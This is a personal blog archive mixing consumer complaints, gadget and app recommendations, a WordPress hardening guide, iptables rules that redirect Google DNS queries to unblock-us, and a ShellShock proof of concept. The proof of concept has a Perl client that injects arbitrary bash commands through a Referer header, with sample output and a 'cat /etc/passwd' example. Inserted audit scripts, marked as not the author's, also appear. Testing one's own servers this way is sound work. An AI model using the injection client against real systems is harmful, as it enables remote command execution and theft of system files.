Thursday, 27 August 2015

Moving to Three (3) mobile - why not - assuming you enjoy pain...

1 day of Three and they suck...

Wed 26th August 2015

Bought 2 PAYG SIMs from 3's shop in the Victoria shopping centre, Tunbridge Wells for the kids as the "123" 3p/minute, 2p/text, 1p/MB tariff looked attractive.

This is mostly for emergency use, with the deal being I put £5 on a month and the kids pay for extra if they want to yabber with friends. To this end I value a simple "no bundle" tariff so that they (and I!) can understand the true value of each minute, text and MB of data.

Thu 27th August 2015

9am - action time! Put one SIM in my son's unlocked mobile. Powered up and "bang": received a text message saying "...we're doing some essential maintenance work" and to try again later.

This went on until after 2pm. Restart the phone, and each time I get a fresh identical text message.

During this 9am-2pm period, the entire of 3's billing website was down with this:

It's not just me - Twitter is alive with the same complaint all over the UK.

15:22 of the same day

Received a different text. This one said:

So I went back to the same shop in Tunbridge Wells.

Showed the chap in the shop the problem - and by now I really was not happy. I should add, my displeasure was obvious, but I never shout or swear at shop staff. But I cannot promise to be fawning and happy when I've just been messed about all morning. 

Did I get an apology? Nope. He said "everyone thinks it's my fault it's broken. It's not." No apologies. 

So off he goes to talk to his colleague. Comes back and says "You'll have to call customer services".

I replied: "Can you give me a new SIM - it says this one is broken and to come in here?"

After another word with his colleague, he said "Yes, you can buy a new SIM for £1 and claim a refund on the other one". "But we cannot just give you a SIM".

At this point I left in a major huff. Talk about failing on every single point of customer service, all for £1's worth of SIM. As for me, I am fuming and this will not rest.

Back home, 17:13.

Have been on the phone to 333 (Customer Services) for 19 minutes.

Every menu option takes you to another automated message. The only way I found to speak to a human was to select sales.

That person was at least apologetic and said the entire billing system was broken most of the day. But he still had to transfer me to customer services.



Finally - customer services... Let the games commence!


After giving details of the broken SIM, the chap confirms it and asks if I'd like a new SIM.

"No thank you" I said, I want my £1 back.

"I'm sorry", he said, "you need to go to the shop for that".

"I've just been to the shop and they said they could not replace the SIM and they did not offer a refund. They said I had to call customer services. So I am not prepared to be a ping pong ball any longer..."

Once he realised I was serious, he offered to credit the £1 back to another number with Three. As it happened the other SIM I bought worked so I asked for the credit to be put there.


Still on with the customer services bloke. Now raising a complaint about the appalling (lack of) service in the Tunbridge Wells shop.

18:00 ish

Finally all done. £1 will be credited back to the other SIM. Complaint about appalling service at shop is registered.


I left Three 1 1/2 years ago as their network, that used to be pretty good, was degrading in the places I needed. The signal was fine, but data was very slow - it felt like the data channels had too much contention.

Having been with EE since, I thought it might be reasonable to see if 3 had improved their network. It's hard to say as I've only just got on it. However, if they have serious unplanned system outages for several hours into the working day, and if the attitude of their shop staff is anything to go by, I am certain that as soon as my top up voucher on the remaining SIM runs out, I will never touch their network ever again.


Well, managed to apply the top up vouchers to the remaining SIM. And yet the Three App breaks ("My3 currently unavailable") and the web page gives this:

Tuesday, 20 January 2015

Rail bosses hit back at 6-year-old girl's cute letter

"Little Ella Porter, from Uckfield, penned the note to bosses at the rail company, pleading with them to help dad Neil arrive home in time to tuck her into bed.
She wrote: "Dear Mr Railway Man, my daddy is always late home and I miss him very much because he always used to tuck me into bed, this makes me upset."

Southern could have done so much more here.

Maybe a couple of cab passes so she and dad could ride up front in a train to see what problems it faces into London.

At the very least a hand written letter from the MD back to the young lady would have been courteous. They might even have set her on the path of being a train driver when she grows up (and yes, women DO drive trains!).

But no - faceless customer service brush off. They spend millions on PR and yet they miss a golden opportunity...

Friday, 26 September 2014

ShellShock GNU bash vulnerability

Here's a proof of concept of the ShellShock attack on Debian 6


Create 2 CGI scripts thus:

test1.cgi (a bash script; note the explicit bash interpreter line):

#!/bin/bash
echo Content-type: text/plain
echo ""
echo Hello

test2.cgi (a perl script; the system() call stays commented out for now):

#!/usr/bin/perl
print "Content-type: text/plain\n";
print "\n";
print "Hello from perl\n";
# show the Referer header as the CGI environment sees it
print "HTTP_REFERER=$ENV{HTTP_REFERER}\n";
#system('/bin/bash -c "echo Im In Bash"');

And the client, testclient (perl, run from your own machine):

#!/usr/bin/perl
use strict;
use warnings;
use LWP;
# a bash function definition with commands appended after the closing brace;
# an unpatched bash runs those commands while importing the function from its environment
my $hackstr = '() { :; }; echo \'Content-type: text/plain\'; echo \'\'; echo \'Youve been 0wn3d\'; ';

my $targeturl = '';
my $ua = LWP::UserAgent->new;
$ua->agent('MyHack 1.0');
my $req = HTTP::Request->new(GET => $targeturl);
$req->header('Referer', $hackstr);   # the webserver exports this as HTTP_REFERER
my $res = $ua->request($req);
if ($res->is_success) {
        print $res->content;
} else {
        print $res->status_line, "\n";
}



Install test1.cgi and test2.cgi on a test webserver under /cgi-bin/ and make sure both are chmod +x.

Edit the $targeturl variable in testclient to point to your test server and set it to test1.cgi.

Run testclient. The output might look something like:

Youve been 0wn3d
Content-type: text/plain


Now change $targeturl in testclient to end in "/test2.cgi".
Run again. The output might look like:

Hello from perl
HTTP_REFERER=() { :; }; echo 'Content-type: text/plain'; echo ''; echo 'Youve been 0wn3d';

So good - non bash CGI scripts do not do anything bad.
EXCEPT, and here's the rub, what if the script calls bash via an exec() or system()?
Well - uncomment the #system... line in test2.cgi and run testclient again:

Hello from perl
HTTP_REFERER=() { :; }; echo 'Content-type: text/plain'; echo ''; echo 'Youve been 0wn3d';

Content-type: text/plain

Youve been 0wn3d
Im In Bash

Oh dear...

Here's an improved testclient, which takes the command to append as its first argument:

#!/usr/bin/perl
use strict;
use warnings;
use LWP;
my $cmd = $ARGV[0];
my $hackstr = '() { :; }; echo \'Content-type: text/plain\'; echo \'\'; echo \'Youve been 0wn3d\'; ' . $cmd;

my $targeturl = '';
my $ua = LWP::UserAgent->new;
$ua->agent('MyHack 1.0');

my $req = HTTP::Request->new(GET => $targeturl);
$req->header('Referer', $hackstr);
my $res = $ua->request($req);
if ($res->is_success) {
        print $res->content;
} else {
        print $res->status_line, "\n";
}

Now you can run testclient with 'hostname -f' as its argument

and get something like:
Hello from perl
HTTP_REFERER=() { :; }; echo 'Content-type: text/plain'; echo ''; echo 'Youve been 0wn3d'; hostname -f

Content-type: text/plain

Youve been 0wn3d

then try: 'cat /etc/passwd'

So what does it all mean?

Well - you'll notice I had to explicitly call /bin/bash in test2.cgi and also make it the explicit interpreter in test1.cgi.

This is because in Debian 6 and 7 at least, apache's default shell is /bin/sh, which is a symlink to /bin/dash. Debian 5 and before used bash as the default shell. NOTE that if you did an in-place dist-upgrade of Debian 5 to 6, /bin/sh will still link to /bin/bash.

So your risk (at least on new installs of Debian 6 onwards) will be limited to any web script that is called directly or indirectly from a CGI mechanism AND invokes bash explicitly - unless you changed the system shell...

Trivial clean test script for testing systems:

#!/usr/bin/perl
use strict;
use warnings;
# export a function definition with a trailing echo; an unpatched bash runs the
# echo while importing the function, before it even gets to the 'exit'
$ENV{SHELLSHOCK} = '() { :; }; echo \'Vulnerable to shellshock\'';

exec('/bin/bash', '-c', 'exit');
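A defender-side audit that follows from the three points above, added here as an example and not the author's test script: it runs the same exported-function probe against the installed bash, reports whether /bin/sh resolves to bash, and lists the CGI scripts that call bash explicitly. The /usr/lib/cgi-bin default (Debian's standard CGI directory) is an assumption; pass another directory as the first argument.

```shell
#!/bin/sh
# Added audit script (not the author's): does this host have the ShellShock
# exposure described above?  Usage: sh shellshock_audit.sh [cgi-dir]
# Assumes a Debian-style layout; /usr/lib/cgi-bin is only the default scan path.

# Returns 0 if the installed bash still runs commands appended to an exported
# function definition. Same trick as the PoC, but nothing leaves this host:
# the marker simply appears on stdout at bash startup.
shellshock_bash_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 1   # no bash at all: nothing to hit
    out=$(env SHELLSHOCK='() { :; }; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Returns 0 if /bin/sh resolves to bash (the in-place Debian 5 -> 6 upgrade
# case), i.e. every system()/exec() that shells out reaches bash, not dash.
sh_is_bash() {
    target=$(readlink -f /bin/sh 2>/dev/null) || return 1
    case "$target" in
        */bash) return 0 ;;
        *)      return 1 ;;
    esac
}

# Prints, one per line, the scripts in a CGI directory that invoke bash
# explicitly: bash as the #! interpreter, a /bin/bash path, or "bash -c".
cgi_scripts_invoking_bash() {
    dir=$1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if grep -Eq '^#!.*bash|/bin/bash|bash[[:space:]]+-c' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Report for this host.
cgidir=${1:-/usr/lib/cgi-bin}
if shellshock_bash_vulnerable; then
    echo "bash: VULNERABLE - patch bash before anything else"
else
    echo "bash: patched (or not installed)"
fi
if sh_is_bash; then
    echo "/bin/sh -> bash: any CGI that shells out is exposed, not just explicit bash callers"
else
    echo "/bin/sh is not bash: exposure limited to scripts that call bash explicitly"
fi
echo "CGI scripts in $cgidir that call bash explicitly:"
cgi_scripts_invoking_bash "$cgidir"
```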

Monday, 9 June 2014

Media Players: Roku and Chromecast and unblock-us problems.

I just bought a Roku 3 and a Google Chromecast stick.

The Roku 3 is a set top box that plugs into your TV's HDMI port and sits on your network. Using a remote control, you can watch various streaming media services such as Netflix, BBC iPlayer and Youtube (and many many more).

The Chromecast stick is slightly different in that it works together with a smartphone or laptop and allows you to "cast" Netflix, Youtube and certain other enabled apps onto your TV.

Now, many people use unblock-us or a similar service to allow us to get access to Netflix's US catalogue rather than the pathetically limited UK catalogue.

unblock-us relies on you being able to choose their DNS servers for your media device so it can route requests for Netflix's catalogue via America and "fool" Netflix into thinking you are in the States.

Let me be clear - Netflix don't mind. You still pay them. The people who want to enforce this ridiculous state of affairs are the film studios who are stuck in the Pleistocene era of regional distribution.

Regions made sense back in the day when films were sent out on reels. A reel of positive film costs an arm and a leg to print and even the likes of Universal can only afford to make so many tens of thousands. So they were sent first to US cinemas. After they were done, the same reels were sent to the UK and other Region 2 countries. Then on to Region 3 countries and so on.

We're living in a digital age now - even cinemas are digital. Copies of media are very cheap (network bandwidth). So it really is an antiquated notion.

Now probably in an effort to placate the content providers, Roku or Netflix (it's a little unclear) and Chromecast (which is a Google device) have chosen to hard code Google's public DNS servers ( and into their devices rather than respecting what my network's DHCP server tells it.

Precisely, Roku/Netflix use my DNS with as the secondary.

One option is to block and at your router (with either a firewall or static route that goes nowhere). I don't like this - and can see it causing problems as the device stutters and waits for a DNS server that will never reply.

Here's a solution for linux enthusiasts, which actually spoofs Google's IPs - so the Roku or Chromecast stick thinks it's talking to Google's DNS but it's actually being bounced to unblock-us's.

You do not need a linux router - but you do need a linux PC on the same LAN (subnet) as your Roku/Chromecast/etc that's always on (at least when you are watching stuff).

Setup (change your IPs to suit)

My Linux server is
My client IP (that I wish to spoof Google for) is
I will be using unblock-us's DNS server

Step 1 - Ensure can handle IP forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2 - Tell your DHCP server to serve as the gateway/default route to the Roku/Chromecast

Step 3 - On, load these netfilter rules:

iptables -t nat -N spoof_google_dns
iptables -t nat -A spoof_google_dns -d -p udp --dport 53 -j CONNMARK --set-xmark 0x2/0x2
iptables -t nat -A spoof_google_dns -d -p udp --dport 53 -j CONNMARK --set-xmark 0x2/0x2
iptables -t nat -A spoof_google_dns -m connmark --mark 0x2/0x2 -j DNAT --to-destination
iptables -t nat -A POSTROUTING -m connmark --mark 0x2/0x2 -j SNAT --to-source
iptables -t nat -A PREROUTING -s -j spoof_google_dns

Add as many copies of the LAST LINE as you need, changing to your Roku/Chromecast client IPs

If you just want to cover the whole network (eg because you don't use static IPs), replace the last line with

iptables -t nat -A PREROUTING -j spoof_google_dns

Add your laptop IP to the rules temporarily and test with

dig @

to test before and after loading the rules. The difference should be obvious.

I like this solution because:

1) It does not "break" the Google IP - it actually spoofs it;

2) It's reasonably clean as far as horrid hacks go;

3) It *only* affects DNS queries to and for specific clients so it does not bend your whole network out of shape.

4) It does not require full scale network restructuring;

5) You could probably pull the same stunt with *BSD or Windows but I have no idea how!

Sunday, 12 January 2014

Squiddy's Recommended - Gadgets and tools

Stuff I personally own or have tested in depth which I've found exceptional.

(I'm neither paid by nor affiliated with any of these companies - just an ordinary user)

Power Bank USB Charger

RAVPower RP-PB07 Power Bank (10.4Ah 1A/2A USB Outputs)

An extremely useful piece of kit if you have a power hungry smartphone and you are away from the mains for the day. Such scenarios might include heavy use of GPS maps when out walking in the countryside.

This device is surprisingly cheap at around £24 for what it is - an external power pack with twin USB outputs and 10.4Ah capacity (enough to charge most smartphones 2-3 times and even recharge a *Pad).

More importantly, the device can actually deliver the goods. The 2A output took my Samsung Galaxy Note 3 from 42% to 75% in the 90 odd minutes I was on the train yesterday, whilst I was tethering my laptop through the phone and occasionally poking the phone. If you know Samsungs, you'll know that's quite an achievement as they are notoriously power hungry.

This unit is not light - but it's not something you'd notice stuck in a backpack as a backup, or in your coat pocket if out and about.

It's not limited to phones - it should charge anything that charges via USB - your mileage may vary.

To charge the unit, use any reasonably powerful charger with a micro-USB (not micro-USB3) plug. Your phone's own charger may serve. Recharge times are approximately overnight.

Food chopping board

TopGourmet Cutting Board

This is a very personal subject and I suspect many of you won't agree with my views - but that's fine.

I'm fussy about chopping boards. I hate glass as they knacker my knives and I don't like them from a tactile point of view. Not keen on plastic - they score too deeply which means hygiene is questionable. I love wood - just right tactile wise - BUT you can't dishwash them which I prefer to do after prepping meat or fish. Well, you can, but they fall to bits in a few months...

The board pictured is actually pretty good. Not as soft as wood, but harder than plastic (doesn't score deeply) and a lot kinder to blades than glass boards. Best bit is, it is fully dishwasher safe - I've had mine for about a year and it is still good. It's the right compromise for my tastes.

It's basically resin bonded paper as far as I can tell. Here's some background.

Fridge/Freezer thermometer

Simple you'd think? What about if you want one with Min/Max readings (to check whether that last long power cut has put your freezer contents in jeopardy)? How about one that's easy to read from one place at eye level and maybe has an alarm?

There are plenty of fridge/freezer thermometers available. However I've never been very impressed with any of them.

This one is definitely well built compared to a lot of the standard offerings and being wireless, there are no wires with sensors to get caught up with the drawers in the freezer.

Not really an essential item, but as my village is prone to random power cuts several times a year, some of which last for 6 hours or more, I value knowing how warm the fridge and freezer got. And the wireless sensors are handy when your fridge and freezer are not adjacent and allow the sensors to be placed at the back where opening the appliance for short times won't cause the sensor to warm up unreasonably quickly.

Word to the wise - put lithium AAs into the freezer sensor - alkalines are not happy at -22C. Normal alkalines are fine in the fridge sensor and display unit though.

Thursday, 11 April 2013

Securing Wordpress - hardening the webserver

There are three main classes of attack against Wordpress:

  1. Obtaining access to a legitimate Wordpress user account.
  2. Finding a vulnerability in the Wordpress codebase, including any plugins or themes your users may have loaded.
  3. Comment SPAM.

All of the above lead to the possibility of inserting SPAM links into your blog. 3 is easiest to deal with by comment moderation or installing antispam measures such as Akismet.

If Admin access is obtained in 1 above or via the second attack class, arbitrary PHP could be uploaded (directly or as plugins or themes) allowing effectively arbitrary code execution on the server as the webserver user. This of course may lead to root exploits against the underlying OS. Some danger also exists in allowing Wordpress admins to upload arbitrary unchecked themes and plugins - there are a huge number out there that contain malicious code.

I personally have been bitten by 2 (attacker uploaded a phpshell, then took over several blogs and used them to distribute a virus via a Windows Internet Explorer attack).

It seemed to me that the first and most general line of defence was to prevent the webserver being able to execute any uploaded files at all, except when the server admin says so.

The first thing is to tell the webserver, Apache 2.2 in my case, to not allow code execution in these directories. These are directories where the webserver and WP need to be able to write files. We only need to worry about paths that the webserver can subsequently serve (and potentially run an interpreter against).
  1. <BLOGBASE>/wp-content/uploads/
  2. <BLOGBASE>/wp-content/plugins/mm-forms/exports/
  3. <BLOGBASE>/wp-content/plugins/mm-forms/captcha/tmp/
1 should be common to all WP installs. 2&3 depend on the plugins running. There of course may be more if you are running different plugins to me.

For each directory above, add this to the apache conf.d/ directory for each path you need to protect (or ensure it is active for each WP site):

<DirectoryMatch /wp-content/uploads/ >
    php_flag engine off
    Options -ExecCGI
    AllowOverride None
</DirectoryMatch>

That may not be the complete solution - I'm checking other options - comments welcome!

Now make the entire WP tree read only to the webserver user (www-data in the case of Debian) and owned by root. Allow the webserver group (also www-data for Debian) write access to the paths above. The owner of these paths will still remain root.

Here's what one of my WP installs looks like to 2 levels deep:

root:root drwxr-xr-x .
root:root drwxr-xr-x ./wp-admin
root:root drwxr-xr-x ./wp-admin/css
root:www-data drwxrwxr-x ./wp-content/uploads
root:root drwxr-xr-x ./wp-content/themes-ai1ec
root:root drwxr-xr-x ./wp-includes/SimplePie

You get the idea...

Now if we need to unlock the blog to allow updates or adding plugins or themes, all we have to do is:

chown -R www-data <WP-path>

and to lock:

chown -R root <WP-path>

Just to be a little safer I run a few extra bits - which are enough to lock a default install down:

chown -R root <WP-base>/
chgrp -R root <WP-base>/
chmod -R o=rX <WP-base>/
chgrp -R www-data <WP-base>/wp-content/uploads/
chmod -R g=rwX <WP-base>/wp-content/uploads/
# and any other paths that need to be webserver writable.

chown -R www-data <WP-base>/
chmod -R u=rwX <WP-base>/

For your convenience, my scripts are available here:
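The lock/unlock steps above, plus the audit they are missing, as an added example (not the author's published scripts): it reproduces the chown/chgrp/chmod sequence as functions and then searches the tree for anything the webserver could still write outside the intended paths. The www-data user/group and the mm-forms paths come from the text; the function names are mine.

```shell
#!/bin/sh
# Added example (not the author's scripts): lock/unlock a WordPress tree as
# described above, plus an audit that lists anything the webserver could still
# write outside the paths opened on purpose. Assumes Debian's www-data user and
# group; the WP base path is an argument. Paths containing spaces are not handled.

WEB_USER=${WEB_USER:-www-data}
WEB_GROUP=${WEB_GROUP:-www-data}
# Directories (relative to the WP base) that WP must be able to write to.
# The mm-forms entries only matter if that plugin is installed.
WRITABLE_DIRS="wp-content/uploads wp-content/plugins/mm-forms/exports wp-content/plugins/mm-forms/captcha/tmp"

# Everything root-owned; the webserver group only gets WRITABLE_DIRS. Needs root.
wp_set_owners() {
    base=$1
    chown -R root:root "$base"
    for d in $WRITABLE_DIRS; do
        if [ -d "$base/$d" ]; then chgrp -R "$WEB_GROUP" "$base/$d"; fi
    done
}

# Group and others read-only everywhere, group-writable inside WRITABLE_DIRS.
wp_set_modes() {
    base=$1
    chmod -R u=rwX,g=rX,o=rX "$base"
    for d in $WRITABLE_DIRS; do
        if [ -d "$base/$d" ]; then chmod -R g=rwX "$base/$d"; fi
    done
}

wp_lock() { wp_set_owners "$1"; wp_set_modes "$1"; }

# Temporarily hand the tree to the webserver so WP can update itself. Needs root.
wp_unlock() { chown -R "$WEB_USER" "$1"; chmod -R u=rwX "$1"; }

# Prints every path that is group- or world-writable, or owned by the webserver
# user, outside WRITABLE_DIRS. Empty output means the tree is locked.
wp_audit() {
    base=$1
    prune=""
    for d in $WRITABLE_DIRS; do
        prune="$prune -path $base/$d -prune -o"
    done
    owner=""
    # only test ownership when the webserver user exists on this host
    if id "$WEB_USER" >/dev/null 2>&1; then owner="-o -user $WEB_USER"; fi
    # $prune and $owner are deliberately left unquoted so find sees separate words
    find "$base" $prune \( -perm -0020 -o -perm -0002 $owner \) -print
}
```

Run wp_audit after every unlock/lock cycle and after WP's own updates; any line it prints is a path where an uploaded file could be written and later served.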

Sunday, 10 February 2013

Android - Squiddy's best apps list

  • Now that Google Reader is having the plug pulled, I've switched to Taptu which is a nice RSS client - allows streams to be merged and has a pretty nice layout.
  • Email - K9 Mail The best I have tried, ever. Multiple accounts, reliable, good notification control, hide lesser used IMAP folders. Free.
  • Launcher - used to be a fan of Go Launcher Ex, which is very customisable and very active. Just switched to Nova Launcher Prime which is smooth, a little lighter and has an excellent App Drawer folder mode avoiding the need for external app sorters. £2.50
  • Car GPS - used to use Sygic, now switched to CoPilot Live which seems snappier. Sygic's paid for traffic addon was becoming unreliable and next to useless. I'm checking to see how CoPilot fares.
  • Walking GPS (UK) - Viewranger. Cannot find anything to beat it that has offline OS 1:25000 maps, purchasable by the tile. Utterly brilliant is the way you can edit a track on a PC or the phone, then share it and follow it in GPS mode. Makes night hikes simple...
  • Real Time GPS Tracker - does what it says. Hide the phone in your kid's bag and send them to the shops (first time out by themselves), knowing you can see where they are on any web enabled device... Could be useful for group outings where the group may want to split up for an hour or two...
  • Ocado shopping app. Assumes you want to buy Waitrose fare, but has an excellent offline mode with full catalogue. Not seen anything as good from the other supermarkets.
  • Mapping cellular signal coverage: Sensorly for reasons explained here.
  • editing: Google's own Blogger app. Does everything I want, so not really looked at the alternatives.
  • Wordpress updates: Wordpress app. Works pretty well unless you get custom with the HTML, then it can lose the plot a bit.